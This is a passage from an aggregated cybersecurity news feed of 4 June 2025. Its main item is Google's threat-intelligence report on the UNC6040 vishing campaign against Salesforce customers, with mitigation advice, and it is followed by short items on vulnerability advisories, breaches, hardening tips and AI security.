during the Vishing calls. Lateral movement for further extortion After breaching Salesforce, the group moves laterally across cloud services, targeting tools like Okta, Microsoft 365, and Workplace to widen the scope of the breach. Researchers point out that, in some cases, extortion attempts have surfaced months after the initial intrusion, with the threat actors even claiming ties to the infamous group ShinyHunters, likely as a pressure tactic. The delay in extortion demands also hints that UNC6040 might be selling or handing off stolen data to other threat actors, who then use it for extortion, resale, or further attacks. GTIG findings suggest that UNC6040 may be a part of a larger criminal network, where different groups handle different stages of an attack. This is based on observed similarities in tactics, techniques, and procedures (TTPs) between UNC6040 and other threat actors linked to a loosely connected collective known as “The Com”, which Scattered Spider is part of. GTIG recommended steps under ‘shared responsibility’ GTIG noted that while platforms like Salesforce offer strong built-in protections, it’s up to the customers to properly configure access, manage permissions, and ensure users are trained according to best practices. A few cloud shared-responsibility best practices to consider include adhering to the principle of least privilege, monitoring access to connected applications, enforcing IP-based Access restrictions, and Multi-factor Authentication (MFA). UNC6040’s tactics aren’t isolated. Similar voice-driven social engineering campaigns have surfaced in recent months, including Scattered Spider’s hybrid Vishing attacks observed in May 2024, and the Letscall malware campaign in South Korea.

https://www.csoonline.com/article/4001744/hackers-use-vishing-to-breach-salesforce-customers-and-swipe-data.html
The Cost of a Call: From Voice Phishing to Data Extortion
2025-06-04T14:00:00Z | 1749045600

Introduction Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements. This approach has proven particularly effective in tricking employees, often within English-speaking branches of multinational corporations, into actions that grant the attackers access or lead to the sharing of sensitive credentials, ultimately facilitating the theft of organization’s Salesforce data. In all observed cases, attackers relied on manipulating end users, not exploiting any vulnerability inherent to Salesforce. A prevalent tactic in UNC6040's operations involves deceiving victims into authorizing a malicious connected app to their organization's Salesforce portal. This application is often a modified version of Salesforce’s Data Loader, not authorized by Salesforce. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page to approve a version of the Data Loader app with a name or branding that differs from the legitimate version. This step inadvertently grants UNC6040 significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. This methodology of abusing Data Loader functionalities via malicious connected apps is consistent with recent observations detailed by Salesforce in their guidance on protecting Salesforce environments from such threats. In some instances, extortion activities haven't been observed until several months after the initial UNC6040 intrusion activity, which could suggest that UNC6040 has partnered with a second threat actor that monetizes access to the stolen data. During these extortion attempts, the actor has claimed affiliation with the well-known hacking group ShinyHunters, likely as a method to increase pressure on their victims. Figure 1: Data Loader attack flow UNC6040 GTIG is currently tracking a significant portion of the investigated activity as UNC6040. UNC6040 is a financially motivated threat cluster that accesses victim networks by voice phishing social engineering. Upon obtaining access, UNC6040 has been observed immediately exfiltrating data from the victim’s Salesforce environment using Salesforce’s Data Loader application. Following this initial data theft, UNC6040 was observed leveraging end-user credentials obtained through credential harvesting or vishing to move laterally through victim networks, accessing and exfiltrating data from the victim's accounts on other cloud platforms such as Okta and Microsoft 365. Attacker Infrastructure  UNC6040 utilized infrastructure to access Salesforce applications that also hosted an Okta phishing panel. This panel was used to trick victims into visiting it from their mobile phones or work computers during the social engineering calls. In these interactions, UNC6040 also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration. Alongside the phishing infrastructure, UNC6040 primarily used Mullvad VPN IP addresses to access and perform the data exfiltration on the victim’s Salesforce environments and other services of the victim's network. Overlap with Groups Linked to “The Com” GTIG has observed infrastructure across various intrusions that shares characteristics with elements previously linked to UNC6040 and threat groups suspected of ties to the broader, loosely organized collective known as "The Com". We’ve also observed overlapping tactics, techniques, and procedures (TTPs), including social engineering via IT support, the targeting of Okta credentials, and an initial focus on English-speaking users at multinational companies. It's plausible that these similarities stem from associated actors operating within the same communities, rather than indicating a direct operational relationship between the threat actors. Data Loader Data Loader is an application developed by Salesforce, designed for the efficient import, export, and update of large data volumes within the Salesforce platform. It offers both a user interface and a command-line component, the latter providing extensive customization and automation capabilities. The application supports OAuth and allows for direct "app" integration via the "connected apps" functionality in Salesforce. Threat actors abuse this by persuading a victim over the phone to open the Salesforce connect setup page and enter a "connection code," thereby linking the actor-controlled Data Loader to the victim's environment. Figure 2: The victim needs to enter a code to connect the threat actor controlled Data Loader Modifications  In some of the intrusions using Data Loader, threat actors utilized modified versions of Data Loader to exfiltrate Salesforce data from victim organizations. The proficiency with the tool and capabilities by executed queries seems to differ from one intrusion to another.  In one instance, a threat actor used small chunk sizes for data exfiltration from Salesforce but was only able to retrieve approximately 10% of the data before detection and access revocation. In another case, numerous test queries were made with small chunk sizes initially. Once sufficient information was gathered, the actor rapidly increased the exfiltration volume to extract entire tables. There were also cases where the threat actors configured their Data Loader application with the name "My Ticket Portal", aligning the tool's appearance with the social engineering pretext used during the vishing calls. Outlook & Implications   Voice phishing (vishing) as a social engineering method is not, in itself, a novel or innovative technique; it has been widely adopted by numerous financially motivated threat groups over recent years with varied results. However, this campaign by UNC6040 is particularly notable due to its focus on exfiltrating data specifically from Salesforce environments. Furthermore, this activity underscores a broader and concerning trend: threat actors are increasingly targeting IT support personnel as a primary vector for gaining initial access, exploiting their roles to compromise valuable enterprise data. The success of campaigns like UNC6040's, leveraging these refined vishing tactics, demonstrates that this approach remains an effective threat vector for financially motivated groups seeking to breach organizational defenses.  Given the extended time frame between initial compromise and extortion, it is possible that multiple victim organizations and potentially downstream victims could face extortion demands in the coming weeks or months. Readiness, Mitigations, and Hardening  This campaign underscores the importance of a shared responsibility model for cloud security. While platforms like Salesforce provide robust, enterprise-grade security controls, it’s essential for customers to configure and manage access, permissions, and user training according to best practices. To defend against social engineering threats, particularly those abusing tools like Data Loader for data exfiltration, organizations should implement a defense-in-depth strategy. GTIG recommends the following key mitigations and hardening steps: Adhere to the Principle of Least Privilege, Especially for Data Access Tools: Grant users only the permissions essential for their roles—no more, no less. Specifically for tools like Data Loader, which often require the "API Enabled" permission for full functionality, limit its assignment strictly. This permission allows broad data export capabilities; therefore, its assignment must be carefully controlled. Per Salesforce's guidance, review and configure Data Loader access to restrict the number of users who can perform mass data operations, and regularly audit profiles and permission sets to ensure appropriate access levels. Manage Access to Connected Applications Rigorously: Control how external applications, including Data Loader, interact with your Salesforce environment. Diligently manage access to your connected apps, specifying which users, profiles, or permission sets can use them and from where. Critically, restrict powerful permissions such as "Customize Application" and "Manage Connected Apps"—which allow users to authorize or install new connected applications—only to essential and trusted administrative personnel. Consider developing a process to review and approve connected apps, potentially allowlisting known safe applications to prevent the unauthorized introduction of malicious ones, such as modified Data Loader instances. Enforce IP-Based Access Restrictions: To counter unauthorized access attempts, including those from threat actors using commercial VPNs, implement IP address restrictions. Set login ranges and trusted IPs, thereby restricting access to your defined enterprise and VPN networks. Define permitted IP ranges for user profiles and, where applicable, for connected app policies to ensure that logins and app authorizations from unexpected or non-trusted IP addresses are denied or appropriately challenged. Leverage Advanced Security Monitoring and Policy Enforcement with Salesforce Shield: For enhanced alerting, visibility, and automated response capabilities, utilize tools within Salesforce Shield. Transaction Security Policies allow you to monitor activities like large data downloads (a common sign of Data Loader abuse) and automatically trigger alerts or block these actions. Complement this with "Event Monitoring" to gain deep visibility into user behavior, data access patterns (e.g., who viewed what data and when), API usage, and other critical activities, helping to detect anomalies indicative of compromise. These logs can also be ingested into your internal security tools for broader analysis. Enforce Multi-Factor Authentication (MFA) Universally: While the social engineering tactics described may involve tricking users into satisfying an MFA prompt (e.g., for authorizing a malicious connected app), MFA remains a foundational security control. Salesforce states that "MFA is an essential, effective tool to enhance protection against unauthorized account access" and requires it for direct logins. Ensure MFA is robustly implemented across your organization and that users are educated on MFA fatigue tactics and social engineering attempts designed to circumvent this critical protection. By implementing these measures, organizations can significantly strengthen their security posture against the types of vishing and the UNC6040 data exfiltration campaign detailed in this report. Regularly review Salesforce’s security documentation, including the Salesforce Security Guide for additional detailed guidance. Read our vishing technical analysis for more details on the vishing threat, and strategic recommendations and best practices to stay ahead of it.

https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion/
Crims stole 40,000 people's data from our network, admits publisher Lee Enterprises
2025-06-04T13:35:14Z | 1749044114

Did somebody say ransomware? Not the newspaper group, not even to deny it Regional newspaper publisher Lee Enterprises says data belonging to around 40,000 people was stolen during an attack on its network earlier this year.

https://go.theregister.com/feed/www.theregister.com/2025/06/04/cyberattack_lee_enterprises/
#Infosec2025: Concern Grows Over Agentic AI Security Risks
2025-06-04T13:30:00Z | 1749043800

Agentic AI systems could threaten security and data privacy, unless organizations test each model and component

https://www.infosecurity-magazine.com/news/infosec2025-agentic-ai-risks/
HPE fixed multiple flaws in its StoreOnce software
2025-06-04T13:29:26Z | 1749043766

Hewlett Packard Enterprise (HPE) addressed multiple flaws in its StoreOnce data backup and deduplication solution. HPE has released security patches for eight vulnerabilities in its StoreOnce backup solution. These issues could allow remote code execution, authentication bypass, data leaks, and more. “Potential security vulnerabilities have been identified in HPE StoreOnce Software.” reads the advisory. “These […]

https://securityaffairs.com/178629/security/hpe-fixed-multiple-flaws-in-its-storeonce-software.html
CC-4663 - Roundcube Releases Security Updates for Webmail
2025-06-04T13:29:00Z | 1749043740

Severity: Medium Updates address a vulnerability that could lead to authenticated remote code execution Security update addresses a critical severity security vulnerability in Roundcube Webmail Updated: 05 Jun 2025

https://digital.nhs.uk/cyber-alerts/2025/cc-4663
Zero Trust, Full Confidence: Portnox and CrowdStrike Together
2025-06-04T13:15:51Z | 1749042951

In today’s complex threat landscape, endpoint visibility and risk-based access control are cornerstones of effective cybersecurity. That’s why we’re thrilled to announce our upcoming integration with CrowdStrike, a leader in endpoint protection and zero trust security. This partnership brings enhanced risk intelligence into Portnox’s cloud-native NAC solution, enabling security teams to enforce access policies based on… The post Zero Trust, Full Confidence: Portnox and CrowdStrike Together appeared first on Portnox.

https://www.portnox.com/blog/portnox-technology/zero-trust-full-confidence-portnox-and-crowdstrike-together/
Portnox and CrowdStrike Integration Fortifies Customer Cybersecurity Posture with Enhanced Risk-Based Access Control
2025-06-04T13:00:17Z | 1749042017

AUSTIN, TX – June 4, 2025 — Portnox, a leading provider of cloud-native, zero trust access control solutions, announced a new integration with CrowdStrike, a leader in endpoint protection and zero trust security. This strategic partnership enhances Portnox’s cloud-native Network Access Control (NAC) solution by incorporating CrowdStrike’s trusted device telemetry and Zero Trust Assessment (ZTA)… The post Portnox and CrowdStrike Integration Fortifies Customer Cybersecurity Posture with Enhanced Risk-Based Access Control appeared first on Portnox.

https://www.portnox.com/blog/press-releases/portnox-and-crowdstrike-integration-fortifies-customer-cybersecurity-posture-with-enhanced-risk-based-access-control/
GSA expands contract reviews to resellers
2025-06-04T13:00:00Z | 1749042000

The General Services Administration is seeking price breakdowns and other information from 10 technology product suppliers as part of GSA's OneGov push to streamline procurement.

https://www.nextgov.com/acquisition/2025/06/gsa-expands-contract-reviews-resellers/405773/
Stronger Cloud Security in Five: 3 Quick Ways to Improve Kubernetes Security in GCP
2025-06-04T13:00:00Z | 1749042000

In this fifth installment of Tenable’s “Stronger Cloud Security in Five” blog series, we offer three best practices for quickly hardening your Kubernetes environment’s security in GCP: remove wide inbound access to cluster APIs; remove root permissions from containers; and remove privileged permissions from publicly accessible groups. Securing your Kubernetes environment is critical in order to protect your cloud application development lifecycle and your container orchestration. However, properly configuring and managing Kubernetes is complicated, and this often leads to lax security controls that put organizations at an elevated risk for a breach.As the “Tenable Cloud Risk Report 2024” found, security weaknesses in Kubernetes environments aren’t the exception – they’re the norm:78% of organizations have publicly accessible Kubernetes API servers, and 41% of those are set to allow inbound internet access.44% run privileged containers, which have access to the host’s resources and kernel capabilities, making them a major risk if attackers gain access to them.58% have cluster-admin role bindings, which give some users complete control over all of their organizations’ Kubernetes environments.Here we outline three best practices that take no more than five minutes to implement and that’ll quickly boost the security of your Google Cloud Platform’s (GCP) Kubernetes environment. Read on!Remove wide inbound access to clusters’ APIsThe Google Kubernetes Engine (GKE) API lets you query and manipulate the state of API objects in Kubernetes. Thus, you should configure its authorized networks setting so it restricts inbound internet access to specific IP addresses. Otherwise, if the authorized network setting is disabled, any public IP address can access the Kubernetes API without any restrictions, creating a significant risk for malicious users to tamper with the API. If you don't use a mechanism to restrict access to your cluster's control plane, it may be exposed to network access publicly.One way this can be mitigated is to limit the authorized networks that can access the control plane in this way: In the GCP Portal, open the resource page of GKE cluster.Under the “Networking - Control plane authorized networks” setting, click the pencil button.Check “Enable control plane authorized networks.”Edit the “Authorized Networks” to allow access only to specific IP addresses that require access to the Kubernetes API.Click “Save Changes” to confirmBy taking these steps, you shrink your Kubernetes clusters’ attack surface and reduce the risk that hackers will breach the control plane via brute-force attacks, API vulnerability exploitation and other attack methods.Remove privileged permissions from containers If attackers exploit a vulnerability in a privileged container’s application, they could control the container’s host and wreak havoc in your Kubernetes environment. For example, attackers could tamper with host devices and kernel parameters, and make malicious OS system calls, such as retrieving files and disabling security controls. That’s why we don’t recommend running privileged containers. You should evaluate Kubernetes workloads and flag every container spec that has the securityContext.privileged flag set to “true,” as shown in the screenshot below. (Source: Tenable)Here’s how you remediate this:For each deployment where a container is provisioned with a privileged security context, set the flag for "privileged" to “false.” Add a Pod Security Standard policy to the namespace default.Remove privileged permissions from publicly accessible groupsYou should be aware that the groups like system:anonymous user and system:unauthenticated can be used by anyone with access to the cluster. In GKE, the system:authenticated group, though it may sound more secure, actually allows access to anyone who can identify with any Google identity (e.g., a Gmail account), making it public. (Source: Google’s “Best practices for GKE RBAC” documentation) Unfortunately, it’s quite common for organizations to inadvertently grant these groups privileged access, which opens the door for potentially anyone on the internet to access critical resources in your Kubernetes environment. In addition, combining this with the first issue we discussed — unrestricted network access to the cluster's control plane — grants permissions that can be leveraged by anyone with network access to the control plane, which in turn has network access from anywhere. This dangerous scenario puts your organization at an elevated risk for a breach if attackers exploit a security flaw in your Kubernetes environment, such as a container pod with a critical vulnerability.To remedy this simply remove any unnecessary role bindings from the publicly accessible groups.ConclusionWe hope you’ve found these three Kubernetes security “quick win” tips helpful and valuable. They’re just a small sample of the comprehensive Kubernetes security best practices our cloud security experts can help you adopt and automate with our Tenable Cloud Security cloud native application protection platform (CNAPP).With Tenable Cloud Security, you can streamline and simplify core Kubernetes security elements across multi-cloud environments, including:Obtaining comprehensive, continuously updated visibility into all your resourcesControlling access to clusters and enforcing least-privilege accessEnforcing policy and configuration control at scaleDetecting container vulnerabilities and malwareAutomating remediation and mitigation of security issues, including misconfigurations, policy violations and overprivileged identitiesFind out how you can take action to boost your Kubernetes and your overall multi-cloud security in just five minutes.Learn more:"Stronger Cloud Security in Five: The Importance of Cloud Configuration Security""Stronger Cloud Security in Five: How To Protect Your Cloud Workloads""Stronger Cloud Security in Five: Securing Your Cloud Identities"“Stronger Cloud Security in Five: How DSPM Helps You Discover, Classify and Secure All Your Data Assets”

https://www.tenable.com/blog/3-quick-ways-to-improve-kubernetes-security
Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads
2025-06-04T12:55:00Z | 1749041700

Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in...

https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html
Practical AI security in multi-cloud environments
2025-06-04T12:45:00Z | 1749041100

As artificial intelligence solutions become ubiquitous, AI security is a key consideration for organizations that want to leverage AI as... The post Practical AI security in multi-cloud environments appeared first on Sysdig.

https://sysdig.com/blog/practical-ai-security-in-multi-cloud-environments/
Practical AI security in multi-cloud environments
2025-06-04T12:45:00Z | 1749041100

As artificial intelligence solutions become ubiquitous, AI security is a key consideration for organizations that want to leverage AI as... The post Practical AI security in multi-cloud environments appeared first on Sysdig.

https://sysdig.com/blog/practical-ai-security-in-multi-cloud-environments/
Major Spanish Retail Brand Hacendado Allegedly Breached, 27 Million Users’ Data Offered for Sale
2025-06-04T12:36:31Z | 1749040591

Hacendado, a prominent Spanish brand primarily associated with Mercadona, one of Spain’s largest supermarket chains, has allegedly fallen victim to a significant data breach. An unauthorized actor claims to have exploited a zero-day vulnerability within a third-party logistics and inventory management system integrated with Hacendado’s backend infrastructure, leading to the compromise of extensive user data. […]

https://dailydarkweb.net/major-spanish-retail-brand-hacendado-allegedly-breached-27-million-users-data-offered-for-sale/
Best Practices for Improving Hybrid and Multicloud Performance
2025-06-04T12:31:00Z | 1749040260

Success in the cloud depends less on adoption and more on agility. Recent industry trends point to emerging data management challenges across cloud service providers and legacy infrastructure, often all at once. This requires a shift in how organizations approach cloud strategies—strategically and proactively. Modern...

https://www.netscout.com/blog/best-practices-improving-hybrid-and-multicloud-performance
Vendor email compromise: The silent $300M threat CISOs can’t ignore
2025-06-04T12:17:04Z | 1749039424

Vendor email compromise (VEC) attacks are bypassing traditional defenses by exploiting human trust rather than technical vulnerabilities, according to a new report by Abnormal AI. The data in the report shows that 72% of employees at large enterprises engaged with fraudulent vendor emails — replying or forwarding messages that contain no links or attachments. This behavior has fueled attempted thefts topping $300 million globally over the past year, with VEC attacks now showing 90% higher engagement rates than traditional business email compromise (BEC). The Europe, Middle East, and Africa (EMEA) region has emerged as ground zero for this growing threat. While EMEA employees interact with VEC scams more than any other region, they report just 0.27% of these incidents, the lowest reporting rate worldwide. The telecom sector appeared most vulnerable, with 71.3% employee engagement, followed by energy and utilities at 56.25%, according to the report. “Email-based social engineering has never been more convincing or more effective,” Mike Britton, CIO at Abnormal AI, said in a press statement. “Attackers are hijacking legitimate vendor threads and crafting sophisticated messages that slip past legacy defenses. Because employees believe these emails are genuine, they are engaging with them at alarming rates.” The report uncovered particularly risky behavior among EMEA’s junior sales teams, who engage with 86% of VEC attempts. While organizations detect and report 4.22% of traditional BEC attacks, a staggering 98.5% of VEC scams go unreported, often only discovered after financial damage occurs. This stands in sharp contrast to the Asia-Pacific (APAC) regions, where BEC remains the dominant threat with 44.4% employee engagement rates. Sujit Dubal, an analyst at QKS Group, said, “Gen AI has elevated VEC attacks to surgical precision. We’re no longer talking about obvious phishing attempts – these are meticulously crafted business communications that circumvent multi-factor authentication and other security measures.”  AI amplifies threat complexity Unlike traditional phishing, VEC attacks mimic legitimate business email threads, often generated using AI to replicate tone, branding, and message history with high accuracy. With no obvious triggers for detection, these emails bypass filters and fool even cautious employees, who, in a tight job market, often rush to resolve perceived issues like missed payments. “Existing controls like multi-factor authentication are failing against these AI-powered attacks,” Dubal warned. “We need a fundamental strategy shift that addresses psychological manipulation, not just credential verification.” Perimeter defenses alone can’t stop this AI-driven VEC, he added. “Organizations need three critical upgrades: AI-powered email analytics that detect subtle inconsistencies, active vendor verification protocols, and retrained employees who recognize social engineering, not just technical threats.” While VEC volume remains lower than phishing or ransomware, its success rate—and potential financial impact—is far greater. “Weaponized AI makes it easier than ever to impersonate trusted vendors,” Britton added, urging organizations to “move beyond reactive training and adopt proactive defenses that block threats before they reach the inbox” to prevent costly human error.

https://www.csoonline.com/article/4001733/vendor-email-compromise-the-silent-300m-threat-cisos-cant-ignore.html
Equipping Students with In-Demand Skills Through Business Builders
2025-06-04T12:15:00Z | 1749039300

Business Builders gamifies learning to help enhance students' analytical and decision-making skills using SAP Analytics Cloud.

https://news.sap.com/2025/06/equipping-students-in-demand-skills-business-builders/
Your SaaS Data Isn't Safe: Why Traditional DLP Solutions Fail in the Browser Era
2025-06-04T12:13:00Z | 1749039180

Traditional data leakage prevention (DLP) tools aren't keeping pace with the realities of how modern businesses use SaaS applications. Companies today rely heavily on SaaS platforms like Google Workspace, Salesforce, Slack, and generative AI tools, significantly altering the way sensitive information is handled. In these environments, data rarely appears as traditional files or crosses networks...

https://thehackernews.com/2025/06/your-saas-data-isnt-safe-why.html
Confused at all the threat group names? You’re not alone. CrowdStrike and Microsoft want to change that
2025-06-04T12:10:00Z | 1749039000

CrowdStrike and Microsoft hope to "bring clarity and coordination" to the cyber industry by unifying threat group naming conventions.

https://www.itpro.com/security/crowdstrike-microsoft-threat-actor-naming-convention-collaboration
The next wave of AI is here
2025-06-04T12:00:00Z | 1749038400

We have entered the agentic AI era, where for the first time, intelligent, autonomous systems will be capable of automating entire workflows in every industry.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m06/the-next-wave-of-ai-is-here.html
Why It?s Time to Retire Traditional VPNs, Part 1
2025-06-04T12:00:00Z | 1749038400

https://www.akamai.com/blog/security/2025/jun/why-time-retire-traditional-vpns-part-1
“Luigi Was Right”: A Look at the Website Sharing Data on More Than 1,000 Executives
2025-06-04T12:00:00Z | 1749038400

Websites “Luigi was right” and “The CEO Database” share the information of CEOs and executives.

https://www.securitymagazine.com/articles/101670-luigi-was-right-a-look-at-the-website-sharing-data-on-more-than-1-000-executives
How to Protect Your Online Presence from Devastating DDoS Attacks
2025-06-04T11:54:03Z | 1749038043

Today, your internet presence is much more than just a website or social media profile, it’s like your…

https://hackread.com/how-to-protect-online-presence-from-ddos-attacks/
HPE StoreOnce Faces Critical CVE-2025-37093 Vulnerability — Urges Immediate Patch Upgrade
2025-06-04T11:45:39Z | 1749037539

Hewlett Packard Enterprise (HPE) has issued a new security advisory addressing eight newly discovered vulnerabilities in its StoreOnce data backup and deduplication platform. Among these, the most severe is an authentication bypass vulnerability tracked as CVE-2025-37093, which carries a near-maximum CVSS score of 9.8, indicating a critical risk to affected systems.  In a security bulletin (document ID: HPESBST04847 rev.1), HPE outlined that multiple versions of its StoreOnce Virtual Storage Appliance (VSA), particularly those prior to version 4.3.11, are vulnerable to a range of remote exploitation risks. These include remote code execution (RCE), server-side request forgery (SSRF), arbitrary file deletion, information disclosure, directory traversal, and authentication bypass.  “These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass, arbitrary file deletion, and directory traversal information disclosure,” HPE warned in the advisory.  Spotlight on CVE-2025-37093: A Critical StoreOnce Vulnerability  The most concerning among the identified threats is CVE-2025-37093, a critical StoreOnce vulnerability. This flaw affects all software versions prior to 4.3.11 and enables unauthenticated attackers to bypass authentication mechanisms and gain unauthorized access to systems.  HPE stated that this vulnerability was reported on October 31, 2024, by an anonymous researcher in collaboration with the Trend Micro Zero Day Initiative (ZDI). The vulnerability, cataloged under ZDI-CAN-24985, is now patched in the newly released software version.  With a CVSS v3.1 vector of AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H, the CVE-2025-37093 vulnerability in StoreOnce poses a serious threat due to its low attack complexity and lack of user interaction required.  Full List of Vulnerabilities  Besides CVE-2025-37093, the advisory highlights the following security issues:  CVE-2025-37089 (ZDI-CAN-24981) – Remote Code Execution (CVSS: 7.2)  CVE-2025-37090 (ZDI-CAN-24982) – Server-Side Request Forgery (CVSS: 5.3)  CVE-2025-37091 (ZDI-CAN-24983) – Remote Code Execution (CVSS: 7.2)  CVE-2025-37092 (ZDI-CAN-24984) – Remote Code Execution (CVSS: 7.2)  CVE-2025-37094 (ZDI-CAN-25314) – Directory Traversal / Arbitrary File Deletion (CVSS: 5.5)  CVE-2025-37095 (ZDI-CAN-25315) – Directory Traversal / Information Disclosure (CVSS: 4.9)  CVE-2025-37096 (ZDI-CAN-25316) – Remote Code Execution (CVSS: 7.2)  Each of these poses various degrees of threat, but it is CVE-2025-37093, the authentication bypass flaw, that requires immediate attention due to its potential to grant full access to unprivileged attackers without requiring credentials.  Who Is Affected and How to Mitigate  Systems running HPE StoreOnce VSA software versions earlier than 4.3.11 are directly impacted. These installations are urged to upgrade to version 4.3.11 or later, which contains the necessary patches to remediate all eight vulnerabilities, including CVE-2025-37093.  While HPE has made the updated software available through the HPE Support Center, organizations are also advised to adhere to their internal patch management protocols when applying third-party patches.   Conclusion   The recent disclosure of multiple vulnerabilities in HPE’s StoreOnce software, most notably the critical authentication bypass flaw tracked as CVE-2025-37093, highlights a pressing security concern for organizations relying on this widely used backup solution. The flaws expose systems to risks such as remote code execution and unauthorized access. With attackers increasingly targeting backup infrastructure to gain deeper access into networks or sabotage recovery efforts, unpatched StoreOnce deployments present a tempting target. Immediate action to upgrade to the patched version is not just advisable—it’s essential for any organization looking to protect sensitive data and maintain operational resilience.

https://thecyberexpress.com/cve-2025-37093-hits-hpe-storeonce-systems/
Roundcube Webmail under fire: critical exploit found after a decade
2025-06-04T11:35:54Z | 1749036954

A critical flaw in Roundcube webmail, undetected for 10 years, allows attackers to take over systems and execute arbitrary code. A critical flaw, tracked as CVE-2025-49113 (CVSS score of 9.9) has been discovered in the Roundcube webmail software. The vulnerability went unnoticed for over a decade, an attacker can exploit the flaw to take control […]

https://securityaffairs.com/178615/hacking/roundcube-webmail-under-fire-critical-exploit-found-after-a-decade.html
How Dangerous Mobile App Permissions Threaten Enterprise Security
2025-06-04T11:30:00Z | 1749036600

Mobile apps often request more access than they need, exposing businesses to unnecessary risk. Dangerous permissions let Android apps tap into sensitive user data and device functions such as reading messages, recording audio, accessing stored files or tracking real-time location. On iOS, dangerous entitlements grant apps elevated privileges that can bypass built-in security controls and […] The post How Dangerous Mobile App Permissions Threaten Enterprise Security appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/06/04/how-dangerous-mobile-app-permissions-threaten-enterprise-security/
Two certificate authorities booted from the good graces of Chrome
2025-06-04T11:20:37Z | 1749036037

Chunghwa Telecom and Netlock customers must look elsewhere for new certificates.

https://arstechnica.com/security/2025/06/chrome-boots-2-certificate-authorities-citing-a-lack-of-trust-and-confidence/
From Assistive AI to Agentic AI: Risks, Responsibilities, and the Road Ahead
2025-06-04T11:15:00Z | 1749035700

As AI becomes more independent, new risks emerge. How do we navigate this next frontier responsibly?

https://news.sap.com/2025/06/assistive-agentic-ai-risks-responsibilities-road-ahead/
Photoshop for Beginners – Overview of Top Skills and How to Hone Them
2025-06-04T10:49:00Z | 1749034140

What comes to your mind when you think of Photoshop? A tool for editing and retouching photos –…

https://hackread.com/photoshop-for-beginners-overview-of-top-skills/
The Race to Build Trump’s ‘Golden Dome’ Missile Defense System Is On
2025-06-04T10:30:00Z | 1749033000

President Donald Trump has proposed building a massive antimissile system in space that could enrich Elon Musk if it materializes. But experts say the project’s feasibility remains unclear.

https://www.wired.com/story/golden-dome-trump-missiles/
Kettering Health Data Breach: 2.6 TB Allegedly Leaked by Interlock Ransomware Group
2025-06-04T10:18:37Z | 1749032317

Kettering Health, a significant Ohio-based healthcare network, has allegedly suffered a major data breach at the hands of the Interlock ransomware group. The group has now reportedly published a substantial 2.6 TB of data, purportedly belonging to the healthcare provider. This development follows earlier reports around May 20-21, 2025, when Kettering Health experienced significant operational […]

https://dailydarkweb.net/kettering-health-data-breach-2-6-tb-allegedly-leaked-by-interlock-ransomware-group/
Malicious PyPI, npm, and Ruby Packages Exposed in Ongoing Open-Source Supply Chain Attacks
2025-06-04T10:11:00Z | 1749031860

Several malicious packages have been uncovered across the npm, Python, and Ruby package repositories that drain funds from cryptocurrency wallets, erase entire codebases after installation, and exfiltrate Telegram API tokens, once again demonstrating the variety of supply chain threats lurking in open-source ecosystems. The findings come from multiple reports published by Checkmarx,...

https://thehackernews.com/2025/06/malicious-pypi-npm-and-ruby-packages.html
The strange tale of ischhfd83: When cybercriminals eat their own
2025-06-04T10:00:55Z | 1749031255

A simple customer query leads to a rabbit hole of backdoored malware and game cheats

https://news.sophos.com/en-us/2025/06/04/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own/
You're Not Ready
2025-06-04T10:00:00Z | 1749031200

Seems bad out there. Unfortunately, it can always get worse. From evil hacker AI to world-changing cyberattacks, WIRED envisions the future you haven't prepared for.

https://www.wired.com/youre-not-ready/
The Texting Network for the End of the World
2025-06-04T10:00:00Z | 1749031200

Everyone knows what it’s like to lose cell service. A burgeoning open source project called Meshtastic is filling the gap for when you’re in the middle of nowhere—or when disaster strikes.

https://www.wired.com/story/youre-not-ready-for-phone-dead-zones/
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare
2025-06-04T10:00:00Z | 1749031200

In the very near future, victory will belong to the savvy blackhat hacker who uses AI to generate code at scale.

https://www.wired.com/story/youre-not-ready-for-ai-hacker-agents/
A GPS Blackout Would Shut Down the World
2025-06-04T10:00:00Z | 1749031200

GPS jamming and spoofing attacks are on the rise. If the global navigation system the US relies on were to go down entirely, it would send the world into unprecedented chaos.

https://www.wired.com/story/youre-not-ready-for-a-gps-blackout/
The US Grid Attack Looming on the Horizon
2025-06-04T10:00:00Z | 1749031200

A major cyberattack on the US electrical grid has long worried security experts. Such an attack wouldn’t be easy. But if an adversary pulled it off, it’d be lights out in more ways than one.

https://www.wired.com/story/youre-not-ready-for-a-grid-attack/
See How Much Faster a Quantum Computer Will Crack Encryption
2025-06-04T10:00:00Z | 1749031200

A quantum computer will likely one day be able to break the encryption protecting the world's secrets. See how much faster such a machine could decrypt a password compared to a present-day supercomputer.

https://www.wired.com/story/youre-not-ready-quantum-cracks/
Deepfake Scams Are Distorting Reality Itself
2025-06-04T10:00:00Z | 1749031200

The easy access that scammers have to sophisticated AI tools means everything from emails to video calls can’t be trusted.

https://www.wired.com/story/youre-not-ready-for-ai-powered-scams/
Australian Non-Profit Epworth Hospital Allegedly Targeted by Global Ransomware Group
2025-06-04T09:36:24Z | 1749029784

A prominent Australian healthcare provider, Epworth HealthCare, has allegedly been targeted by a global ransomware group. Epworth HealthCare is a leading not-for-profit private hospital group in Victoria, known for its high-quality medical, surgical, and rehabilitation services. Established in 1920, the organization operates major hospitals across Melbourne and Geelong, playing a significant role in the region’s […]

